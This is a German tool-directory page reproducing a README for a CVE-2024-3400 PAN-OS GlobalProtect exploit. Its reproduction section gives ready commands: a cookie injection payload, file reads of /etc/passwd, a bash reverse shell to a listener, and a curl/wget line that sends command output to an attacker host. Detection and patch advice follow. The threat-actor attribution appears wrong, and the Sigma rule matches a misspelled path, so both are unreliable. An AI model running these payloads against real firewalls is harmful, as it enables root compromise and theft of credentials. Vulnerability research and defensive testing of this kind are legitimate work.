Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2024-3400-panos_rce_reproduction — Reproduktion von cve-2024-3400-panos_rce_reproduction | Kitploit
Tools/GitHubGitHub/razureink/cve-2024-3400-panos_rce_reproduction
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungRed TeamingLabs & Praxis
GitHub
razureink/cve-2024-3400-panos_rce_reproduction

cve-2024-3400-panos_rce_reproduction

Reproduktion von cve-2024-3400-panos_rce_reproduction

Repository anzeigen
11vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-3400: Palo Alto PAN-OS GlobalProtect Befehlsinjektion RCE

CVSS 10.0 KRITISCH | CWE-78: OS-Befehlsinjektion | Massenhaft in freier Wildbahn ausgenutzt


Überblick

CVE-2024-3400 ist eine Befehlsinjektions-Schwachstelle vor der Authentifizierung in den GlobalProtect-Portal- und Gateway-Schnittstellen von Palo Alto Networks PAN-OS. Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, beliebige Befehle mit Root-Rechten auf der betroffenen Firewall auszuführen.

  • Entdeckt von: Volexity (April 2024)
  • Zugeschriebener Bedrohungsakteur: UNC4554 / Midnight Blizzard (staatlich gefördert, Russland)
  • CVE-ID: CVE-2024-3400
  • CVSS-Score: 10.0 (Kritisch)
  • CWE: CWE-78 (Unzureichende Neutralisierung spezieller Elemente in einem OS-Befehl)
  • Auswirkung: Vollständige Kompromittierung von PAN-OS-Firewall-Appliances, laterale Bewegung, Ransomware-Einsatz
  • Status: Vor der öffentlichen Offenlegung als 0-Day aktiv ausgenutzt

Technische Details

Grundursache

Die Schwachstelle liegt in der Sitzungscookie-Verarbeitung der GlobalProtect-Portal- und Gateway-Komponente. Die Funktion, die für die Verarbeitung des SESSID-Cookies zuständig ist, unterlässt es, die vom Benutzer gelieferten Eingaben ordnungsgemäß zu bereinigen, bevor sie an einen Shell-Befehl übergeben wird.

Konkret führt eine nicht authentifizierte HTTP-Anfrage an den GlobalProtect-Portal-Endpunkt (/global-protect/login.esp) mit einem manipulierten SESSID-Cookie, das eingebettete Shell-Metazeichen (Backticks und Variablenexpansion) enthält, zu einer Befehlsinjektion.

Injektionsmechanismus

Der anfällige Codepfad funktioniert wie folgt:

  1. Das GlobalProtect-Portal empfängt eine Anfrage an /global-protect/login.esp
  2. Der Wert des SESSID-Cookies wird ohne Bereinigung extrahiert
  3. Dieser Wert wird in eine Shell-Befehlszeichenfolge interpoliert
  4. Der Befehl wird über system() oder eine ähnliche OS-Befehlsausführungsfunktion ausgeführt
  5. Da die Anwendung als Root läuft, wird der injizierte Befehl mit vollen Systemrechten ausgeführt

Payload-Konstruktion

Die Injektions-Payload verwendet in Backticks gesetzte Befehle innerhalb des SESSID-Cookies:

SESSID=/../../../opt/panlogs/tmp/device_telemetry/`COMMAND`.py

Die Pfad-Traversal (/../../../) verlässt das vorgesehene Verzeichnis, und der in Backticks gesetzte COMMAND-Teil veranlasst die Shell, die Eingabe des Angreifers auszuführen. Umleitung der Ausgabe oder Reverse-Shell-Mechanismen können verwendet werden, um Befehlsergebnisse zu exfiltrieren.


Betroffene Versionen

PAN-OS-VersionBetroffenBehoben in
10.2.x< 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h110.2.4-h16 / 10.2.5-h6 / 10.2.6-h3 / 10.2.7-h8 / 10.2.8-h3 / 10.2.9-h1
11.0.x< 11.0.1-h10, < 11.0.2-h4, < 11.0.3-h1011.0.1-h10 / 11.0.2-h4 / 11.0.3-h10
11.1.x< 11.1.1-h311.1.1-h3

Hinweis: PAN-OS 9.x und frühere Versionen sind nicht betroffen. Cloud NGFW und Prisma Access sind nicht betroffen.


Ausnutzung

Angriffsvektor

  • Netzwerk: Remote
  • Authentifizierung: Keine erforderlich
  • Erforderliche Berechtigung: Keine
  • Benutzerinteraktion: Keine
  • Auswirkung: Vollständige Kompromittierung von Vertraulichkeit, Integrität und Verfügbarkeit

Beobachtete Aktivitäten des Bedrohungsakteurs

Es wurde beobachtet, dass UNC4554 / Midnight Blizzard (APT29) CVE-2024-3400 ab März 2024 als 0-Day ausnutzte. Volexity veröffentlichte ihre Analyse am 12. April 2024. Die Angriffsmuster umfassten:

  1. Erstzugriff: Massenhaftes Scannen nach exponierten GlobalProtect-Portalen
  2. Befehlsausführung: Einsetzen von maßgeschneiderten Python-Backdoors über den Cookie-Injektionsvektor
  3. Persistenz: Installation der UPSTYLE-Backdoor, Diebstahl von Anmeldedaten, Extraktion von Konfigurationen
  4. Laterale Bewegung: Nutzung kompromittierter Firewalls als Einstiegspunkte in interne Netzwerke
  5. Datencxfiltration: Stehlen von Konfigurationsdateien, VPN-Anmeldedaten und Sitzungstokens
  6. Ransomware: Mehrere Vorfälle mit Ransomware-Einsatz nach der anfänglichen Kompromittierung

Verfügbarkeit von Proof-of-Concept

Es wurden mehrere öffentliche PoCs veröffentlicht. Dieses Repository stellt einen funktionsfähigen Exploit für autorisierte Tests bereit.


Reproduktionsschritte

Anforderungen

  • Python 3.8+
  • requests-Bibliothek
  • Ziel: Palo Alto PAN-OS mit einem exponierten, anfälligen GlobalProtect-Portal
  • Nur mit autorisiertem Zugriff

Einrichtung

pip install requests

Basisexploit

python exploit.py --target https://vulnerable-firewall.example.com --command "id"

Reverse-Shell-Beispiel

# Start listener on attacker machine
nc -lvnp 4444

# Execute reverse shell
python exploit.py --target https://vuln-panos.example.com \
  --command "bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"

Beliebige Datei lesen

python exploit.py --target https://vuln-panos.example.com --command "cat /etc/passwd"

Proof-of-Concept (curl)

# Basic command execution test
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`id\`.py" \
  'https://target/global-protect/login.esp'

# Command output capture via DNS exfiltration
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`wget -O- http://attacker/$(id|base64)\`.py" \
  'https://target/global-protect/login.esp'

PoC-Skript

Siehe exploit.py in diesem Repository für einen voll ausgestatteten Python-Exploit mit Unterstützung für:

  • Beliebige Befehlsausführung
  • Optionale Proxy-Unterstützung (Burp Suite / mitmproxy)
  • SSL-Verifizierungssteuerung
  • Timeout- und Wiederholungsbehandlung
  • Antwortanalyse

Erkennung

IOCs

  • Anfragen an /global-protect/login.esp mit ungewöhnlich langen oder verdächtigen SESSID-Cookies
  • Cookies, die Pfad-Traversal-Sequenzen (/../../) in Kombination mit Backtick-Zeichen enthalten
  • Unerwartete Prozesse, die von der GlobalProtect-Komponente gestartet werden
  • Ausgehende Verbindungen von der Firewall zu unbekannten IP-Adressen auf ungewöhnlichen Ports
  • Dateien mit .py-Erweiterung, die nach /opt/panlogs/tmp/device_telemetry/ geschrieben werden

Sigma-Regel (vereinfacht)

title: CVE-2024-3400 PAN-OS GlobalProtect Command Injection
status: stable
logsource:
  category: webserver
detection:
  selection:
    cs-uri-query: "/global-protocol/login.esp"
    cs-cookie|contains:
      - "../"
      - "`"
  condition: selection

Gegenmaßnahmen

Sofortmaßnahmen

  1. PAN-OS aktualisieren auf die oben aufgeführten behobenen Versionen
  2. Falls ein sofortiges Patchen nicht möglich ist, wenden Sie einen der folgenden Workarounds an:
    • Device-Telemetrie deaktivieren: set deviceconfig system telemetry disable yes (blockiert den anfälligen Codepfad, ohne einen Neustart zu erfordern)
    • Zugriffskontrolle für GlobalProtect-Portal/Gateway: Beschränken Sie den Zugriff auf vertrauenswürdige Quell-IPs
  3. Auf Kompromittierung prüfen: Suchen Sie nach nicht autorisierten Dateien in /opt/panlogs/tmp/device_telemetry/
  4. Protokolle prüfen: Überprüfen Sie die GlobalProtect-Anmeldeprotokolle auf anomale SESSID-Cookie-Werte

Permanenter Fix

Wenden Sie den von Palo Alto Networks bereitgestellten Hotfix an. Der Fix bereinigt die Cookie-Eingabe ordnungsgemäß, bevor der Shell-Befehl erstellt wird.

Kompromittierungsbewertung

Wenn Sie eine Ausnutzung vermuten:

Tool herunterladen